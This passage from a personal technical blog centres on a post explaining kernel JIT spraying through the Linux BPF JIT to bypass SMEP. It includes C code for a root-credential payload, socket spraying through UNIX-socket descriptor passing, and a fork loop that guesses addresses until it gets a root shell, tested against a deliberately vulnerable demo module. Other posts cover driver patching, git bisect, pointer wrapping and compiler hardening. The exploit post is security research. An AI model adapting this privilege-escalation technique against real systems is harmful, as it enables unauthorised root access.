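    // (vendor, product) pairs as stored consecutively, little-endian,
    // in the driver's USB device ID table
    let le_bytes = |vendor: u16, product: u16| -> Vec<u8> {
        let mut b = vendor.to_le_bytes().to_vec();
        b.extend_from_slice(&product.to_le_bytes());
        b
    };

    // ASIX AX88772B, the entry we overwrite:
    assert_eq!(le_bytes(0x0b95, 0x772b), [0x95, 0x0b, 0x2b, 0x77]);
    // Lenovo U2L100P, the entry we want:
    assert_eq!(le_bytes(0x17ef, 0x7203), [0xef, 0x17, 0x03, 0x72]);
}
```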
<p>I wanted to do this within the Debian installer without rebooting. <a href="http://www.busybox.net/">Busybox</a> <code>sed</code> does not support hex escapes, but <code>printf</code> does:</p>
<pre><code>sed $(printf 's/\x95\x0b\x2b\x77/\xef\x17\x03\x72/') \
/lib/modules/$(uname -r)/kernel/drivers/net/usb/asix.ko \
> /tmp/asix.ko</code></pre>
<p>(It's worth checking that none of those bytes have untoward meanings as ASCII characters in a regular expression. As it happens, <code>sed</code> does not recognize <code>+</code> (aka <code>\x2b</code>) as repetition unless preceded by a backslash.)</p>
<p>Then I loaded the patched module along with its dependencies. A simple way is</p>
<pre><code>modprobe asix
rmmod asix
insmod /tmp/asix.ko</code></pre>
<p>And that was enough for me to complete the install over Ethernet. Of course, once everything is set up, it would be better to compile a properly-patched kernel using <a href="http://www.debian.org/releases/wheezy/amd64/ch08s06.html.en"><code>make-kpkg</code></a>. I haven't got around to it yet because wireless is working great. :)</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com86tag:blogger.com,1999:blog-1563623855220143059.post-71703971455692653682012-11-17T21:51:00.000-08:002012-11-17T21:51:41.191-08:00Attacking hardened Linux systems with kernel JIT spraying
<p>Intel's new Ivy Bridge CPUs support a security feature called <a href="http://www.anandtech.com/show/4830/intels-ivy-bridge-architecture-exposed/2">Supervisor Mode Execution Protection</a> (SMEP). It's supposed to thwart privilege escalation attacks, by preventing the kernel from executing a payload provided by userspace. In reality, there are <a href="http://vulnfactory.org/blog/2011/06/05/smep-what-is-it-and-how-to-beat-it-on-linux/">many ways</a> to bypass SMEP.</p>
<p>This article demonstrates one particularly fun approach. Since the Linux kernel <a href="https://lwn.net/Articles/437981">implements</a> a just-in-time compiler for Berkeley Packet Filter programs, we can use a JIT spraying attack to build our attack payload within the kernel's memory. Along the way, we will use another fun trick to create thousands of sockets even if <code>RLIMIT_NOFILE</code> is set as low as 11.</p>
<p>If you have some idea what I'm talking about, feel free to skip the next few sections and get to the gritty details. Otherwise, I hope to provide enough background that anyone with some systems programming experience can follow along. The code is <a href="https://github.com/kmcallister/alameda">available on GitHub</a> too.</p>
<p>Note to script kiddies: This code won't get you root on any real system. It's not an exploit against current Linux; it's a demonstration of how such an exploit could be modified to bypass SMEP protections.</p>
<h1 id="kernel-exploitation-and-smep">Kernel exploitation and SMEP</h1>
<p>The basis of kernel security is the CPU's distinction between user and kernel mode. Code running in user mode cannot manipulate kernel memory. This allows the kernel to store things (like the user ID of the current process) without fear of tampering by userspace code.</p>
<p>In a typical kernel exploit, we trick the kernel into jumping to our payload code while the CPU is still in kernel mode. Then we can mess with kernel data structures and gain privileges. The payload can be an ordinary function in the exploit program's memory. After all, the CPU in kernel mode is allowed to execute user memory: it's allowed to do anything!</p>
<p>But what if it wasn't? When SMEP is enabled, the CPU will block any attempt to execute user memory while in kernel mode. (Of course, the kernel still has ultimate authority and can disable SMEP if it wants to. The goal is to prevent <em>unintended</em> execution of userspace code, as in a kernel exploit.)</p>
<p>So even if we find a bug which lets us hijack kernel control flow, we can only direct it towards legitimate kernel code. This is a lot like exploiting a userspace program with <a href="http://en.wikipedia.org/wiki/NX_bit">no-execute</a> data, and the same techniques apply.</p>
<p>If you haven't seen some kernel exploits before, you might want to check out the <a href="http://mainisusuallyafunction.blogspot.com/2012/01/writing-kernel-exploits.html">talk</a> I gave, or the many references linked from those slides.</p>
<h1 id="jit-spraying">JIT spraying</h1>
<p><a href="http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf">JIT spraying</a> [PDF] is a viable tactic when we (the attacker) control the input to a <a href="http://en.wikipedia.org/wiki/Just-in-time_compilation">just-in-time compiler</a>. The JIT will write into executable memory on our behalf, and we have some control over what it writes.</p>
<p>Of course, a JIT compiling untrusted code will be careful with what instructions it produces. The trick of JIT spraying is that seemingly innocuous instructions can be trouble when looked at another way. Suppose we input this (pseudocode) program to a JIT:</p>
<pre><code>x = 0xa8XXYYZZ
x = 0xa8PPQQRR
x = ...</code></pre>
<p>(Here <code>XXYYZZ</code> and <code>PPQQRR</code> stand for arbitrary three-byte quantities.) The JIT might decide to put variable <code>x</code> in the <code>%eax</code> machine register, and produce x86 code like this:</p>
<pre><code>machine code assembly (AT&T syntax)
b8 ZZ YY XX a8 mov $0xa8XXYYZZ, %eax
b8 RR QQ PP a8 mov $0xa8PPQQRR, %eax
b8 ...</code></pre>
<p>Looks harmless enough. But suppose we use a vulnerability elsewhere to direct control flow to the second byte of this program. The processor will then see an instruction stream like</p>
<pre><code>ZZ YY XX (payload instruction)
a8 b8 test $0xb8, %al
RR QQ PP (payload instruction)
a8 b8 test $0xb8, %al
...</code></pre>
<p>We control those bytes <code>ZZ YY XX</code> and <code>RR QQ PP</code>. So we can smuggle any sequence of three-byte x86 instructions into an executable memory page. The classic scenario is browser exploitation: we embed our payload into a JavaScript or Flash program as above, and then exploit a browser bug to redirect control into the JIT-compiled code. But it works equally well against kernels, as we shall see.</p>
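<p>To make the regrouping concrete, here is a small sketch in C (with arbitrary placeholder payload bytes, not the real exploit code) that lays out the legitimate <code>mov</code> stream so we can check how the bytes pair up when decoding starts one byte in:</p>

```c
#include <stddef.h>
#include <stdint.h>

// Emit n "mov $imm32, %eax" instructions whose 32-bit immediates carry
// three payload bytes each, topped with the 0xa8 glue byte. This mirrors
// the byte layout shown above; the payload contents are placeholders.
size_t emit_movs(uint8_t *buf, const uint8_t payloads[][3], size_t n) {
    size_t len = 0;
    for (size_t i = 0; i < n; i++) {
        buf[len++] = 0xb8;            // mov $imm32, %eax opcode
        buf[len++] = payloads[i][0];  // immediate, little-endian:
        buf[len++] = payloads[i][1];  //   three payload bytes...
        buf[len++] = payloads[i][2];
        buf[len++] = 0xa8;            //   ...then the glue byte
    }
    return len;
}
```

<p>Starting from offset 1, the decoder sees three payload bytes, then <code>a8 b8</code> (the harmless <code>test $0xb8, %al</code>), then the next three payload bytes, and so on.</p>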
<h1 id="attacking-the-bpf-jit">Attacking the BPF JIT</h1>
<p>Berkeley Packet Filters (BPF) allow a userspace program to specify which network traffic it wants to receive. Filters are <a href="http://www.freebsd.org/cgi/man.cgi?query=bpf&apropos=0&sektion=0&manpath=FreeBSD+8-current&format=html#FILTER_MACHINE">virtual machine</a> programs which run in kernel mode. This is done for efficiency; it avoids a system call round-trip for each rejected packet. Since version 3.0, Linux on AMD64 optionally <a href="http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commitdiff;h=0a14842f5a3c0e88a1e59fac5c3025db39721f74">implements</a> the BPF virtual machine using a just-in-time compiler.</p>
<p>For our JIT spray attack, we will build a BPF program in memory.</p>
<pre class="sourceCode c"><code class="sourceCode c">size_t code_len = <span class="dv">0</span>;
<span class="kw">struct</span> sock_filter code[<span class="dv">1024</span>];
<span class="dt">void</span> emit_bpf(<span class="dt">uint16_t</span> opcode, <span class="dt">uint32_t</span> operand) {
code[code_len++] = (<span class="kw">struct</span> sock_filter) BPF_STMT(opcode, operand);
}</code></pre>
<p>A BPF "load immediate" instruction will compile to <span style="white-space:
nowrap;"><code>mov $x, %eax</code></span>. We embed our payload instructions inside these, exactly as we saw above.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="co">// Embed a three-byte x86 instruction.</span>
<span class="dt">void</span> emit3(<span class="dt">uint8_t</span> x, <span class="dt">uint8_t</span> y, <span class="dt">uint8_t</span> z) {
<span class="kw">union</span> {
<span class="dt">uint8_t</span> buf[<span class="dv">4</span>];
<span class="dt">uint32_t</span> imm;
} operand = {
.buf = { x, y, z, <span class="bn">0xa8</span> }
};
emit_bpf(BPF_LD+BPF_IMM, operand.imm);
}
<span class="co">// Pad shorter instructions with nops.</span>
<span class="ot">#define emit2(_x, _y) emit3((_x), (_y), 0x90)</span>
<span class="ot">#define emit1(_x) emit3((_x), 0x90, 0x90)</span></code></pre>
<p>Remember, the byte <code>a8</code> eats the opcode <code>b8</code> from the following legitimate <code>mov</code> instruction, turning into the harmless instruction <span
style="white-space: nowrap;"><code>test $0xb8, %al</code></span>.</p>
<p>Calling a kernel function is a slight challenge because we can only use three-byte instructions. We load the function's address one byte at a time, and sign-extend from 32 bits.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="dt">void</span> emit_call(<span class="dt">uint32_t</span> addr) {
emit2(<span class="bn">0xb4</span>, (addr & <span class="bn">0xff000000</span>) >> <span class="dv">24</span>); <span class="co">// mov $x, %ah</span>
emit2(<span class="bn">0xb0</span>, (addr & <span class="bn">0x00ff0000</span>) >> <span class="dv">16</span>); <span class="co">// mov $x, %al</span>
emit3(<span class="bn">0xc1</span>, <span class="bn">0xe0</span>, <span class="bn">0x10</span>); <span class="co">// shl $16, %eax</span>
emit2(<span class="bn">0xb4</span>, (addr & <span class="bn">0x0000ff00</span>) >> <span class="dv">8</span>); <span class="co">// mov $x, %ah</span>
emit2(<span class="bn">0xb0</span>, (addr & <span class="bn">0x000000ff</span>)); <span class="co">// mov $x, %al</span>
emit2(<span class="bn">0x48</span>, <span class="bn">0x98</span>); <span class="co">// cltq</span>
emit2(<span class="bn">0xff</span>, <span class="bn">0xd0</span>); <span class="co">// call *%rax</span>
}</code></pre>
<p>Then we can build a classic "get root" payload like so:</p>
<pre class="sourceCode c"><code class="sourceCode c">emit3(<span class="bn">0x48</span>, <span class="bn">0x31</span>, <span class="bn">0xff</span>); <span class="co">// xor %rdi, %rdi</span>
emit_call(get_kernel_symbol(<span class="st">"prepare_kernel_cred"</span>));
emit3(<span class="bn">0x48</span>, <span class="bn">0x89</span>, <span class="bn">0xc7</span>); <span class="co">// mov %rax, %rdi</span>
emit_call(get_kernel_symbol(<span class="st">"commit_creds"</span>));
emit1(<span class="bn">0xc3</span>); <span class="co">// ret</span></code></pre>
<p>This is just the C call</p>
<pre class="sourceCode c"><code class="sourceCode c">commit_creds(prepare_kernel_cred(<span class="dv">0</span>));</code></pre>
<p>expressed in our strange dialect of machine code. It will give root privileges to the process the kernel is currently acting on behalf of, i.e., our exploit program.</p>
<p>Looking up function addresses is a well-studied part of kernel exploitation. My <code>get_kernel_symbol</code> just greps through <code>/proc/kallsyms</code>, which is a simplistic solution for demonstration purposes. In a real-world exploit you would search a number of sources, including hard-coded values for the precompiled kernels put out by major distributions.</p>
<p>Alternatively the JIT spray payload could just disable SMEP, then jump to a traditional payload in userspace memory. We don't need any kernel functions to disable SMEP; we just poke a CPU control register. Once we get to the traditional payload, we're running normal C code in kernel mode, and we have the flexibility to search memory for any functions or data we might need.</p>
<h1 id="filling-memory-with-sockets">Filling memory with sockets</h1>
<p>The "spray" part of JIT spraying involves creating many copies of the payload in memory, and then making an informed guess of the address of one of them. In Dion Blazakis's original paper, this is done using a separate information leak in the Flash plugin.</p>
<p>For this kernel exploit, it turns out that we don't need any information leak. The BPF JIT <a href="http://lxr.linux.no/linux+v3.6.5/arch/x86/net/bpf_jit_comp.c#L627">uses <code>module_alloc</code></a> to allocate memory in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">1.5 GB space</a> reserved for kernel modules. And the compiled program is aligned to a <a href="http://en.wikipedia.org/wiki/Page_(computer_memory)">page</a>, i.e., a multiple of 4 kB. So we have fewer than 19 bits of address to guess. If we can get 8000 copies of our program into memory, we have a 1 in 50 chance on each guess, which is not too bad.</p>
<p>Each socket can only have one packet filter attached, so we need to create a bunch of sockets. This means we could run into the <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/setrlimit.2.html">resource limit</a> on the number of open files. But there's a fun way around this limitation. (I learned this trick from <a href="http://blog.nelhage.com/">Nelson Elhage</a> but I haven't seen it published before.)</p>
<p><a href="http://en.wikipedia.org/wiki/Unix_domain_socket">UNIX domain sockets</a> can transmit things other than raw bytes. In particular, they can <a href="http://www.lst.de/~okir/blackhats/node121.html">transmit</a> file descriptors<sup><a href="#bpf_spray_fn1" class="footnoteRef" id="bpf_spray_fnref1">1</a></sup>. An FD sitting in a UNIX socket buffer might have already been closed by the sender. But it could be read back out in the future, so the kernel has to maintain all data structures relating to the FD — including BPF programs!</p>
<p>So we can make as many BPF-filtered sockets as we want, as long as we send them into <em>other</em> sockets and close them as we go. There are limits on the number of FDs enqueued on a socket, as well as the depth<sup><a href="#bpf_spray_fn2" class="footnoteRef" id="bpf_spray_fnref2">2</a></sup> of sockets sent through sockets sent through etc. But we can easily hit our goal of 8000 filter programs using a tree structure.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define SOCKET_FANOUT 20</span>
<span class="ot">#define SOCKET_DEPTH 3</span>
<span class="co">// Create a socket with our BPF program attached.</span>
<span class="dt">int</span> create_filtered_socket() {
<span class="dt">int</span> fd = socket(AF_INET, SOCK_DGRAM, <span class="dv">0</span>);
setsockopt(fd, SOL_SOCKET, SO_ATTACH_FILTER, &filt, <span class="kw">sizeof</span>(filt));
<span class="kw">return</span> fd;
}
<span class="co">// Send an fd through a UNIX socket.</span>
<span class="dt">void</span> send_fd(<span class="dt">int</span> dest, <span class="dt">int</span> fd_to_send);
<span class="co">// Create a whole bunch of filtered sockets.</span>
<span class="dt">void</span> create_socket_tree(<span class="dt">int</span> parent, size_t depth) {
<span class="dt">int</span> fds[<span class="dv">2</span>];
size_t i;
<span class="kw">for</span> (i=<span class="dv">0</span>; i<SOCKET_FANOUT; i++) {
<span class="kw">if</span> (depth == (SOCKET_DEPTH - <span class="dv">1</span>)) {
<span class="co">// Leaf of the tree.</span>
<span class="co">// Create a filtered socket and send it to 'parent'.</span>
fds[<span class="dv">0</span>] = create_filtered_socket();
send_fd(parent, fds[<span class="dv">0</span>]);
close(fds[<span class="dv">0</span>]);
} <span class="kw">else</span> {
<span class="co">// Interior node of the tree.</span>
<span class="co">// Send a subtree into a UNIX socket pair.</span>
socketpair(AF_UNIX, SOCK_DGRAM, <span class="dv">0</span>, fds);
create_socket_tree(fds[<span class="dv">0</span>], depth<span class="dv">+1</span>);
<span class="co">// Send the pair to 'parent' and close it.</span>
send_fd(parent, fds[<span class="dv">0</span>]);
send_fd(parent, fds[<span class="dv">1</span>]);
close(fds[<span class="dv">0</span>]);
close(fds[<span class="dv">1</span>]);
}
}
}</code></pre>
<p>The <a href="http://www.kernel.org/doc/man-pages/online/pages/man3/cmsg.3.html">interface</a> for sending FDs through a UNIX socket is really, <em>really</em> ugly, so I didn't show that code here. You can check out the <a href="https://github.com/kmcallister/alameda/blob/master/alameda.c#L388">implementation of <code>send_fd</code></a> if you want to.</p>
<h1 id="the-exploit">The exploit</h1>
<p>Since this whole article is about a strategy for exploiting kernel bugs, we need some kernel bug to exploit. For demonstration purposes I'll load an obviously insecure <a href="https://github.com/kmcallister/alameda/blob/master/ko/jump.c">kernel module</a> which will jump to any address we write to <code>/proc/jump</code>.</p>
<p>We know that a JIT-produced code page is somewhere in the <a href="http://lxr.linux.no/linux+v3.6.5/Documentation/x86/x86_64/mm.txt">region</a> used for kernel modules. We want to land 3 bytes into this page, skipping an <span
style="white-space: nowrap"><code>xor %eax, %eax</code></span> (<code>31 c0</code>) and the initial <code>b8</code> opcode.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="ot">#define MODULE_START 0xffffffffa0000000UL</span>
<span class="ot">#define MODULE_END 0xfffffffffff00000UL</span>
<span class="ot">#define MODULE_PAGES ((MODULE_END - MODULE_START) / 0x1000)</span>
<span class="ot">#define PAYLOAD_OFFSET 3</span></code></pre>
<p>A bad guess will likely oops the kernel and kill the current process. So we <a href="http://www.kernel.org/doc/man-pages/online/pages/man2/fork.2.html">fork</a> off child processes to do the guessing, and keep doing this as long as they're dying with <code>SIGKILL</code>.</p>
<pre class="sourceCode c"><code class="sourceCode c"><span class="dt">int</span> status, jump_fd, urandom;
<span class="dt">unsigned</span> <span class="dt">int</span> pgnum;
<span class="dt">uint64_t</span> payload_addr;
<span class="co">// ...</span>
jump_fd = open(<span class="st">"/proc/jump"</span>, O_WRONLY);
urandom = open(<span class="st">"/dev/urandom"</span>, O_RDONLY);
<span class="kw">do</span> {
<span class="kw">if</span> (!fork()) {
<span class="co">// Child process</span>
read(urandom, &pgnum, <span class="kw">sizeof</span>(pgnum));
pgnum %= MODULE_PAGES;
payload_addr = MODULE_START + (<span class="bn">0x1000</span> * pgnum) + PAYLOAD_OFFSET;
write(jump_fd, &payload_addr, <span class="kw">sizeof</span>(payload_addr));
execl(<span class="st">"/bin/sh"</span>, <span class="st">"sh"</span>, NULL); <span class="co">// Root shell!</span>
} <span class="kw">else</span> {
wait(&status);
}
} <span class="kw">while</span> (WIFSIGNALED(status) && (WTERMSIG(status) == SIGKILL));</code></pre>
<p>The <code>fork</code>ed children get a copy of the whole process's state, of course, but they don't actually need it. The BPF programs live in kernel memory, which is shared by all processes. So the program that sets up the payload could be totally unrelated to the one that guesses addresses.</p>
<h1 id="notes">Notes</h1>
<p>The full source is <a href="https://github.com/kmcallister/alameda">available on GitHub</a>. It includes some error handling and cleanup code that I elided above.</p>
<p>I'll admit that this is mostly a curiosity, for two reasons:</p>
<ul class="incremental">
<li>SMEP is not widely deployed yet.</li>
<li>The BPF JIT is disabled by default, and distributions don't enable it.</li>
</ul>
<p>Unless Intel abandons SMEP in subsequent processors, it will be widespread within a few years. It's less clear that the BPF JIT will ever catch on as a default configuration. But I'll note in passing that Linux is now using BPF programs for <a href="http://outflux.net/teach-seccomp/">process sandboxing</a> as well.</p>
<p>The BPF JIT is enabled by writing <code>1</code> to <code>/proc/sys/net/core/bpf_jit_enable</code>. You can write <code>2</code> to enable a debug mode, which will print the compiled program and its address to the kernel log. This makes life unreasonably easy for my exploit, by removing the address guesswork.</p>
<p>I don't have a CPU with SMEP, but I did try a <a href="http://grsecurity.net/">grsecurity</a> / PaX hardened kernel. PaX's KERNEXEC feature implements<sup><a href="#fn3" class="footnoteRef" id="fnref3">3</a></sup> in software a policy very similar to SMEP. And indeed, the JIT spray exploit succeeds where a traditional jump-to-userspace fails. (grsecurity has other features that would mitigate this attack, like the ability to lock out users who oops the kernel.)</p>
<p>The ARM, SPARC, and 64-bit PowerPC architectures each have their own BPF JIT. But I don't think they can be used for JIT spraying, because these architectures have fixed-size, aligned instructions. Perhaps on an ARM kernel built for Thumb-2...</p>
<div class="footnotes">
<hr />
<ol>
<li id="bpf_spray_fn1"><p>Actually, <a href="http://pubs.opengroup.org/onlinepubs/009695399/basedefs/xbd_chap03.html#tag_03_253">file <em>descriptions</em></a>. The description is the kernel state pertaining to an open file. The descriptor is a small integer referring to a file description. When we send an FD into a UNIX socket, the descriptor number received on the other end might be different, but it will refer to the same description.<a href="#bpf_spray_fnref1">↩</a></p></li>
<li id="bpf_spray_fn2"><p>While testing this code, I got the error <code>ETOOMANYREFS</code>. This was easy to track down, as there's only <a href="http://lxr.linux.no/linux+v3.6.5/net/unix/af_unix.c#L1376">one place</a> in the entire kernel where it is used.<a href="#bpf_spray_fnref2">↩</a></p></li>
<li id="fn3"><p>On i386, KERNEXEC uses <a href="http://www.cs.cmu.edu/~410/doc/segments/segments.html">x86 segmentation</a>, with negligible performance impact. Unfortunately, AMD64's vestigial segmentation is not good enough, so there KERNEXEC relies on a <a href="http://gcc.gnu.org/wiki/plugins">GCC plugin</a> to instrument every computed control flow instruction in the kernel. Specifically, it <code>or</code>s the target address with <span style="white-space: nowrap;"><code>(1 << 63)</code></span>. If the target was a userspace address, the new address will be <a href="http://en.wikipedia.org/wiki/X86-64#Canonical_form_addresses">non-canonical</a> and the processor will fault.<a href="#fnref3">↩</a></p></li>
</ol>
</div>
keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com470tag:blogger.com,1999:blog-1563623855220143059.post-10959670329342741472012-09-18T07:45:00.000-07:002012-09-18T07:45:44.771-07:00Tracking down unused variables with Pyflakes and git bisect<p>I was working on a Python project when I noticed a variable that was defined but never used. Does this indicate that some important code was accidentally deleted? Or was there just a minor oversight during refactoring?</p>
<p>To answer this question, I wanted to see the Git commit which removed the last use of this variable. This sounds like a job for <a href="http://www.kernel.org/pub/software/scm/git/docs/git-bisect.html"><code>git bisect</code></a>. And because <a href="http://pypi.python.org/pypi/pyflakes">Pyflakes</a> can detect unused variables, the whole process is completely automatic.</p>
<p>I made a guess that the <code>mystery_variable</code> became unused sometime within the past two weeks. Then I told Git to consider a commit "good" if Pyflakes's list of complaints does not mention <code>mystery_variable</code>.</p>
<pre><code><span class="Prompt">$</span> <span class="Entry">git bisect start master master@{'2 weeks ago'}</span>
Already on 'master'
Bisecting: 150 revisions left to test after this (roughly 7 steps)
[066327622129dbe863f6e2fc4746ff9e869bd049] Synthesize gravity
<span class="Prompt">$</span> <span class="Entry">git bisect run bash -c '! pyflakes foo.py | grep mystery_variable'</span>
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 75 revisions left to test after this (roughly 6 steps)
[d3a5665eff478cccfb86d994a8fc289446325fbf] Model object components
running bash -c ! pyflakes foo.py | grep mystery_variable
Bisecting: 37 revisions left to test after this (roughly 5 steps)
[6ddcfbf27a1a4548acf972a6b817e485743f6bd9] Time-compress simulator clock
...
running bash -c ! pyflakes foo.py | grep mystery_variable
9c2b2f006207ae9f274f9182efeb3e009d18ed04 is the first bad commit
commit 9c2b2f006207ae9f274f9182efeb3e009d18ed04
Author: Ben Bitdiddle <bitdiddle@example.com>
Date: Fri Sep 14 01:38:31 2012 -0400
Reticulate splines
</code></pre>
<p>Now I can examine this commit and see what happened.</p>keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com170tag:blogger.com,1999:blog-1563623855220143059.post-68169049497999398402012-09-09T18:51:00.000-07:002012-09-09T18:51:05.757-07:00taralli: Screen edge pointer wrapping for X<p>The maximum travel distance between points on a desktop is substantially reduced if the pointer is allowed to travel off a screen edge and reappear at the opposite edge. In other words, we change the topology of the desktop to be that of a torus. This is not a new idea: it's implemented in several <a href="http://fixunix.com/xwindows/91117-can-mouse-wrap-around-screen-edges-xfree86.html">window managers</a>, programs for <a href="http://www.addictivetips.com/windows-tips/wrap-mouse-pointer-around-the-screen-in-windows-with-edgeless-2/">Windows</a> and <a href="http://www.digicowsoftware.com/detail?_app=Wraparound">Mac OS X</a>, and is even the subject of a <a href="http://insitu.lri.fr/TorusDesktop/TorusDesktop">research paper</a>.</p>
<p>I wanted a standalone program to implement mouse pointer wrapping for X Windows on GNU/Linux. Previously I was using <a href="http://synergy-foss.org/">Synergy</a> for this task. Synergy is a very cool program, but it's not a good choice for pointer wrapping on a single machine.</p>
<ul class="incremental">
<li><p><strong>Correctness</strong>: I have several monitors at different resolutions, which means my desktop isn't rectangular. Synergy didn't understand where the edge of each monitor is.</p></li>
<li><p><strong>Security</strong>: I don't need the exposure of 95,000 lines of code for this simple task. Even if there are no bugs in Synergy, I'm one configuration mistake away from running an unencrypted network keylogger.</p></li>
<li><p><strong>Energy efficiency</strong>: Synergy wakes up 40 times per second even when nothing is happening. This can have a significant impact on laptop battery life.</p></li>
</ul>
<p>So I wrote <a href="https://github.com/kmcallister/taralli"><code>taralli</code></a> as a simple replacement. It doesn't automatically understand non-rectangular desktops, but you can easily customize the pointer position mapping, to implement multi-monitor wrap-around or many other behaviors. (If someone would like to contribute the code to get multi-monitor information from <a href="http://en.wikipedia.org/wiki/Xinerama">Xinerama</a> or something, I would be happy to add that.)</p>
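<p>As a flavor of what such a mapping can look like, here is a hypothetical single-screen version (my own sketch, not taralli's actual code): when the pointer touches an edge, warp it to just inside the opposite edge.</p>

```c
// Map pointer coordinates onto a torus: a pointer resting on one edge of a
// width x height screen is warped to just inside the opposite edge.
// Warping one pixel inside avoids immediately re-triggering the wrap.
void wrap_pointer(int *x, int *y, int width, int height) {
    if (*x == 0)                *x = width - 2;
    else if (*x == width - 1)   *x = 1;
    if (*y == 0)                *y = height - 2;
    else if (*y == height - 1)  *y = 1;
}
```

<p>A multi-monitor mapping would do the same per-screen, using each monitor's own bounds.</p>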
<p><code>taralli</code> is under 100 lines of C99. It has been tested on GNU/Linux and is likely portable to other X platforms. You can <a href="https://github.com/kmcallister/taralli">download it from GitHub</a>, which is also a great place to submit any bug reports or patches.</p>
keeganhttp://www.blogger.com/profile/12227260241426017476noreply@blogger.com141tag:blogger.com,1999:blog-1563623855220143059.post-72249426175449000912012-05-13T09:59:00.000-07:002012-05-13T09:59:04.470-07:00Automatic binary hardening with Autoconf<p>How do you protect a C program against memory corruption exploits? We should try to write code with no bugs, but we also need protection against any bugs which may lurk. Put another way, I try not to crash my bike but I still wear a helmet.</p>
<p>Operating systems now support a variety of tricks to make life difficult for would-be attackers. But most of these hardening features need to be enabled at compile time. When I started contributing to <a href="http://mosh.mit.edu/">Mosh</a>, I made it a goal to build with full hardening on every platform, not just <a href="https://wiki.ubuntu.com/Security/Features">proactive</a> distributions like Ubuntu. This means detecting available hardening features at compile time.</p>
<p>Mosh uses Autotools, so this code is naturally part of the <a href="http://www.gnu.org/software/autoconf/">Autoconf</a> script. I know that Autotools has a bad reputation in some circles, and I'm not going to defend it here. But a huge number of existing projects use Autotools. They can benefit today from a drop-in hardening recipe.</p>
<p>I've published an <a href="https://github.com/kmcallister/autoharden">example project</a> which uses Autotools to detect and enable some binary hardening features. To the extent possible under law, I <a href="https://github.com/kmcallister/autoharden/blob/master/LICENSE">waive all copyright</a> and related or neighboring rights to the code I wrote for this project. (There are some third-party files in the <code>m4/</code> subdirectory; those are governed by the respective licenses which appear in each file.) I want this code to be widely useful, and I welcome any refinements you have.</p>
<p>This article explains how my auto-detection code works, with some detail about the hardening measures themselves. If you just want to add hardening to your project, you don't necessarily need to read the whole thing. At the end I talk a bit about the performance implications.</p>
<h1 id="how-it-works">How it works</h1>
<p>The basic idea is simple. We use <code>AX_CHECK_{COMPILE,LINK}_FLAG</code> from the <a href="http://www.gnu.org/software/autoconf-archive/">Autoconf Archive</a> to detect support for each feature. The syntax is</p>
<div style="padding-left: 20px">
<code>AX_CHECK_COMPILE_FLAG</code>(<em>flag</em>, <em>action-if-supported</em>, <em>action-if-unsupported</em>, <em>extra-flags</em>)
</div>
<p>For <em>extra-flags</em> we generally pass <code>-Werror</code> so the compiler will fail on unrecognized flags. Since the project contains both C and C++ code, we check each flag once for the C compiler and once for the C++ compiler. Also, some flags depend on others, or have multiple alternative forms. This is reflected in the nesting structure of the <em>action-if-supported</em> and <em>action-if-unsupported</em> blocks. You can see the full story in <a href="https://github.com/kmcallister/autoharden/blob/master/configure.ac#L21"><code>configure.ac</code></a>.</p>
<p>We accumulate all the supported flags into <code>HARDEN_{C,LD}FLAGS</code> and substitute these into each <code>Makefile.am</code>. The hardening flags take effect even if the user overrides <code>CFLAGS</code> on the command line. To explicitly disable hardening, pass</p>
<pre><code>./configure --disable-hardening</code></pre>
<p>A useful command when testing is</p>
<pre><code>grep HARDEN config.log
</code></pre>
<h1 id="complications">Complications</h1>
<p><a href="http://clang.llvm.org/">Clang</a> will not error out on unrecognized flags, even with <code>-Werror</code>. Instead it prints a message like</p>
<pre><code>clang: warning: argument unused during compilation: '-foo'</code></pre>
<p>and continues on blithely. I don't want these warnings to appear during the actual build, so I hacked around Clang's behavior. The script <a href="https://github.com/kmcallister/autoharden/blob/master/scripts/wrap-compiler-for-flag-check"><code>wrap-compiler-for-flag-check</code></a> runs a command and errors out if the command prints a line containing "<code>warning: argument unused</code>". Then <code>configure</code> temporarily sets</p>
<pre class="sourceCode bash"><code class="sourceCode bash"><span class="ot">CC=</span><span class="st">"</span><span class="ot">$srcdir</span><span class="st">/scripts/wrap-compiler-for-flag-check </span><span class="ot">$CC</span><span class="st">"</span></code></pre>
<p>while performing the flag checks.</p>
<p>When I integrated hardening into Mosh, I discovered that Ubuntu's default hardening flags <a href="https://github.com/keithw/mosh/issues/203">conflict</a> with ours. For example we set <span
style="white-space:nowrap;"><code>-Wstack-protector</code></span>, meaning "warn about any unprotected functions", and they set <span
style="white-space:nowrap;"><code>--param=ssp-buffer-size=4</code></span>, meaning "don't protect functions with fewer than 4 bytes of buffers". Our stack-protector flags are strictly more aggressive, so I disabled Ubuntu's by adding these lines to <a href="https://github.com/keithw/mosh/blob/mosh-1.2/debian/rules#L12"><code>debian/rules</code></a>:</p>
<pre><code>export DEB_BUILD_MAINT_OPTIONS = hardening=-stackprotector
-include /usr/share/dpkg/buildflags.mk</code></pre>
<p>We did <a href="https://github.com/keithw/mosh/blob/dee09fb8fcaab9abcecb748be5b31088b9c2b987/fedora/mosh.spec#L32">something similar</a> for Fedora.</p>
<p>Yet another problem is that Debian distributes <a href="http://www.skarnet.org/software/skalibs/">skalibs</a> (a Mosh dependency) as a <a href="http://packages.debian.org/squeeze/skalibs-dev">static-only library</a>, built without <code>-fPIC</code>, which in turn prevents Mosh from using <code>-fPIC</code>. Mosh can build the relevant parts of skalibs <a href="https://github.com/keithw/mosh/tree/mosh-1.2/third/libstddjb">internally</a>, but Debian and Ubuntu don't want us doing that. The unfortunate solution is simply to <a href="https://github.com/keithw/mosh/commit/0eec0b60f0c5b3d94d5e382ea3d4aff35c879ed2">reimplement</a> the small amount of skalibs we were using on Linux.</p>
<h1 id="the-flags">The flags</h1>
<p>Here are the specific protections I enabled.</p>
<ul class="incremental">
